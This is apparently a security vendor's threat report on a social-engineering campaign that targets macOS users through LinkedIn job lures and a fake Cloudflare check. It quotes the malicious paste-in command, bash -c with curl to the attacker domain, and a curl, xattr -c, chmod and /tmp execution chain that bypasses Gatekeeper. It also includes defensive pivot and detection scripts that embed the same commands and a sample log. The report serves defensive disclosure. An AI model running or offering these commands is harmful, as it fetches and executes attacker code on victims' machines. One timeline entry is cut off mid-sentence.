June 2025 - Social Engineering Meets Shell Script Malware
  • 05 Jun 2025


In April 2025, our team began tracking a sophisticated social engineering campaign, patterned after the ClickFix malware attacks, that targeted macOS users with phishing links disguised as legitimate business requests - specifically job applications aimed at experienced medical professionals.

The campaign used cloned Cloudflare browser verification pages to deliver shell script malware. The investigation, dubbed Operation L2J4, revealed a broader infrastructure likely controlled by a financially motivated threat actor group with a LinkedIn presence and a network of shell companies, uncovered by examining their incorporation data and other public corporate documents (or the absence of them).

Tactics, Techniques, and Procedures (TTPs):

  • Primary Malicious Domain: security-check-l2j4[.]com
  • Pretexting (Social Engineering): Lures victims with Canva links delivered by private message on LinkedIn under the pretext of a job application.
  • Fake CAPTCHA Challenge: Spoofs Cloudflare's browser check interface and instructs victims to click a checkbox. Notably, the challenge does not appear on every visit to the site, which makes it look more legitimate to the victim.
  • Terminal Command Execution: After checkbox interaction, users are instructed to copy/paste a Terminal command under the guise of verification which then creates a reverse shell on the victim's machine.

/bin/bash -c "$(curl -fsSL https://security-check-l2j4.com/verify.sh)"

  • Payload Obfuscation: The command is base64-encoded and decoded in the browser by JavaScript.
  • macOS-Specific Evasion: A secondary payload (update) is downloaded and launched via:

    • curl -o /tmp/update https://security-check-l2j4.com/update &&
      xattr -c /tmp/update &&
      chmod +x /tmp/update &&
      /tmp/update
  • Bypasses Gatekeeper: xattr -c clears the file's extended attributes, including the quarantine flag, so the unsigned binary executes without a Gatekeeper prompt.

Shared Infrastructure Insight: All three domains resolve to the same IP address, 82.180.172.175, hosted by Hostinger in Phoenix, Arizona. Hostinger is a low-cost hosting provider that allows up to 25 domains per plan and offers free website migration services: a setup ideal for threat actors looking to rotate infrastructure and maintain continuity despite takedown attempts. This shared infrastructure strongly suggests centralized control and supports the hypothesis of a coordinated operation originating from, or facilitated by, the same actor. The websites also link to one another at key points in their user interfaces, further establishing their role as infrastructure in this attack pattern.

Cloudflare Obfuscation Observed: As of the most recent DNS resolution, security-check-l2j4.com resolves to the Cloudflare IP address 162.159.36.12, as well as additional Cloudflare endpoints 104.21.15.248 and 172.67.165.88. This suggests the domain is actively protected by Cloudflare’s CDN, WAF, and Load Balancer services, which obscure the origin server’s IP.

Notably, Cloudflare has flagged the domain as a suspected phishing site, and traffic is actively filtered on both port 443 (HTTPS) and port 80 (HTTP). TLS certificate data shows the site was issued certificates by Cloudflare and Google Trust Services on the same day the domain was registered. Despite this, the domain remains reachable and is still fronted by Cloudflare edge infrastructure. Port 80 is open and may be useful in future misconfiguration discovery attempts.

Efforts to discover the true origin IP are ongoing using passive DNS, certificate transparency logs, and subdomain enumeration.
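The shared-hosting pivot and the CDN-fronting problem described above can be worked through on passive DNS style records. The following is an added example, not code or data from the report: the RECORDS list is constructed (the domain security-check-l2j4.com and the four IPs for it come from the report; the two *.example lure domains stand in for the related domains the report mentions but does not name, and the dates are invented). The Cloudflare ranges are a subset of Cloudflare's published IPv4 list.

```python
"""Infrastructure pivot on passive-DNS style records: cluster domains that share a
direct (non-CDN) hosting IP and separate CDN edge IPs from candidate origin IPs.
Added example; RECORDS below is constructed for illustration, not data from the report."""
import ipaddress
from collections import defaultdict

# Subset of Cloudflare's published IPv4 ranges (https://www.cloudflare.com/ips-v4).
# The real list is longer; a production tool should fetch it rather than hard-code it.
CLOUDFLARE_V4 = [ipaddress.ip_network(c) for c in (
    "104.16.0.0/13", "104.24.0.0/14", "172.64.0.0/13", "162.158.0.0/15",
    "173.245.48.0/20", "141.101.64.0/18", "108.162.192.0/18", "198.41.128.0/17",
    "188.114.96.0/20",
)]

# Constructed records: (domain, resolved_ip, first_seen). The first domain and its
# IPs come from the report; the *.example domains are placeholders for the two
# related domains the report refers to but does not name; dates are invented.
RECORDS = [
    ("security-check-l2j4.com",    "82.180.172.175", "2025-04-14"),
    ("security-check-l2j4.com",    "162.159.36.12",  "2025-04-20"),
    ("security-check-l2j4.com",    "104.21.15.248",  "2025-04-20"),
    ("security-check-l2j4.com",    "172.67.165.88",  "2025-04-20"),
    ("second-lure-domain.example", "82.180.172.175", "2025-04-14"),
    ("third-lure-domain.example",  "82.180.172.175", "2025-04-15"),
    ("unrelated-site.example",     "203.0.113.10",   "2025-04-01"),
]


def is_cdn_ip(ip: str) -> bool:
    """True when the address falls inside a known Cloudflare edge range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_V4)


def cluster_by_origin(records):
    """Map each direct hosting IP to the domains that resolved to it, keeping only
    IPs shared by more than one domain (the 'shared infrastructure' signal)."""
    by_ip = defaultdict(set)
    for domain, ip, _ in records:
        if not is_cdn_ip(ip):
            by_ip[ip].add(domain)
    return {ip: sorted(domains) for ip, domains in by_ip.items() if len(domains) > 1}


def history(records, domain):
    """Resolution history for one domain, oldest first, each hop tagged cdn/direct."""
    rows = sorted((seen, ip) for d, ip, seen in records if d == domain)
    return [(seen, ip, "cdn" if is_cdn_ip(ip) else "direct") for seen, ip in rows]


def candidate_origins(records, domain):
    """Direct IPs a domain resolved to at any point. Once a domain moves behind a
    CDN, these historical records are what passive DNS preserves for analysts."""
    return sorted({ip for _, ip, kind in history(records, domain) if kind == "direct"})


if __name__ == "__main__":
    for ip, domains in cluster_by_origin(RECORDS).items():
        print(f"shared direct IP {ip}: {', '.join(domains)}")
    for row in history(RECORDS, "security-check-l2j4.com"):
        print(row)
    print("candidate origins:", candidate_origins(RECORDS, "security-check-l2j4.com"))
```

Run against real passive DNS exports, the same three functions give the blocklist input (every domain that ever sat on the shared hosting IP) and the pre-CDN history that certificate transparency and DNS records alone do not show.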

Timeline:

  • April 14–17: Initial phishing domains discovered; Canva pages linked to credential harvesting.
  • April 17: Shell script uncovered and analyzed.
  • April 18: security-check-l2j4.com payloads begin returning 404 errors, indicating potential actor

Recommendations:

  • Block all traffic to security-check-l2j4.com and related infrastructure
  • Warn users against executing terminal commands from web-based prompts
  • Monitor /tmp/ directories for unsigned binaries or execution events
  • Deploy EDR rules to flag use of xattr -c and suspicious curl-based downloads
  • Monitor and restrict access to shared IPs associated with actor infrastructure (e.g., 82.180.172.175)
  • Investigate potential methods to discover origin IPs behind Cloudflare masking (e.g., certificate transparency logs, misconfigured DNS)
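The /tmp monitoring and the xattr/curl rules in the recommendations above, applied to the execution chain listed under TTPs, can be expressed as stage rules correlated up the process tree. The following is an added example, not code from the report or any vendor's EDR: the event format ("<ts> user=<u> pid=<n> ppid=<n> cmd=<command line>") and SAMPLE_LOG are constructed, the indicator values come from the report, and the severity thresholds are an assumed triage policy.

```python
"""Process-event detector for the ClickFix-style chain described in the report:
bash -c "$(curl ...)", curl to /tmp, xattr -c, chmod +x, execution from /tmp.
Added example; the log format and SAMPLE_LOG are constructed, not a real EDR format."""
import re
from collections import defaultdict

# Indicators quoted in the report.
IOC_DOMAINS = {"security-check-l2j4.com"}
IOC_IPS = {"82.180.172.175"}

# One rule per stage of the chain, matched against the process command line.
STAGE_RULES = {
    "bash_exec_of_curl_output": re.compile(r'/bin/(?:ba)?sh\s+-c\s+"?\$\(\s*curl\b'),
    "curl_download_to_tmp":     re.compile(r'\bcurl\b.*\s-o\s+/tmp/\S+'),
    "xattr_quarantine_strip":   re.compile(r'\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\b'),
    "chmod_exec_in_tmp":        re.compile(r'\bchmod\s+\+x\s+/tmp/\S+'),
    "exec_from_tmp":            re.compile(r'^/tmp/\S+'),
}

# Constructed event format: "<ts> user=<u> pid=<n> ppid=<n> cmd=<command line>"
EVENT_RE = re.compile(
    r'^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+pid=(?P<pid>\d+)\s+ppid=(?P<ppid>\d+)\s+cmd=(?P<cmd>.*)$')

# Constructed sample: the chain from the report under one bash -c, plus a benign curl.
SAMPLE_LOG = """\
2025-04-17T10:01:02Z user=drjones pid=4101 ppid=4000 cmd=/usr/bin/open -a Safari
2025-04-17T10:01:30Z user=drjones pid=4102 ppid=4000 cmd=/bin/bash -c "$(curl -fsSL https://security-check-l2j4.com/verify.sh)"
2025-04-17T10:01:31Z user=drjones pid=4103 ppid=4102 cmd=curl -o /tmp/update https://security-check-l2j4.com/update
2025-04-17T10:01:32Z user=drjones pid=4104 ppid=4102 cmd=xattr -c /tmp/update
2025-04-17T10:01:32Z user=drjones pid=4105 ppid=4102 cmd=chmod +x /tmp/update
2025-04-17T10:01:33Z user=drjones pid=4106 ppid=4102 cmd=/tmp/update
2025-04-17T10:05:00Z user=drjones pid=4107 ppid=4000 cmd=curl -o /tmp/notes.txt https://example.com/notes.txt
"""


def parse_event(line):
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["pid"], ev["ppid"] = int(ev["pid"]), int(ev["ppid"])
    return ev


def match_stages(cmd):
    return [name for name, rx in STAGE_RULES.items() if rx.search(cmd)]


def match_iocs(cmd):
    return sorted(ioc for ioc in IOC_DOMAINS | IOC_IPS if ioc in cmd)


def scan_log(text):
    """Return {root_pid: verdict}. Findings are correlated up the process tree so the
    separate stages spawned by one bash -c land in a single alert."""
    events = [ev for ev in map(parse_event, text.splitlines()) if ev]
    parent = {ev["pid"]: ev["ppid"] for ev in events}
    hits = {}
    for ev in events:
        stages, iocs = match_stages(ev["cmd"]), match_iocs(ev["cmd"])
        if stages or iocs:
            hits[ev["pid"]] = (stages, iocs)

    def root(pid):
        # Climb while the parent is itself a flagged process.
        while parent.get(pid) in hits:
            pid = parent[pid]
        return pid

    trees = defaultdict(lambda: {"stages": set(), "iocs": set(), "pids": []})
    for pid, (stages, iocs) in hits.items():
        tree = trees[root(pid)]
        tree["stages"].update(stages)
        tree["iocs"].update(iocs)
        tree["pids"].append(pid)

    verdicts = {}
    for root_pid, tree in trees.items():
        if tree["iocs"] or len(tree["stages"]) >= 3:
            severity = "high"      # known indicator, or most of the chain observed
        elif tree["stages"] & {"bash_exec_of_curl_output", "xattr_quarantine_strip"}:
            severity = "medium"    # a single but unusual stage
        else:
            severity = "low"       # e.g. a lone curl into /tmp, common in benign use
        verdicts[root_pid] = {"severity": severity,
                              "stages": sorted(tree["stages"]),
                              "iocs": sorted(tree["iocs"]),
                              "pids": sorted(tree["pids"])}
    return verdicts


if __name__ == "__main__":
    for root_pid, verdict in scan_log(SAMPLE_LOG).items():
        print(root_pid, verdict)
```

The tree correlation is the part worth keeping when porting this to a real EDR query language: a lone curl into /tmp is noise, but curl, xattr -c, chmod +x and execution from /tmp under one shell parent is the chain described in this report.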

Conclusion:

Operation L2J4 highlights the evolving nature of social engineering campaigns - blending user psychology, legitimate-looking infrastructure, and platform-specific malware to achieve their goals. The combination of cloned interfaces, actor-controlled infrastructure, and shell-based payloads represents a growing threat, especially for organizations relying on user trust and macOS endpoints.
